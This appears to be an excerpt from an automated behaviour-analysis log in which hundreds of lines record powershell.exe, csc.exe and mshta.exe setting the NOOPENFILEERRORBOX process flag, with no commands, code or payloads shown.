Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
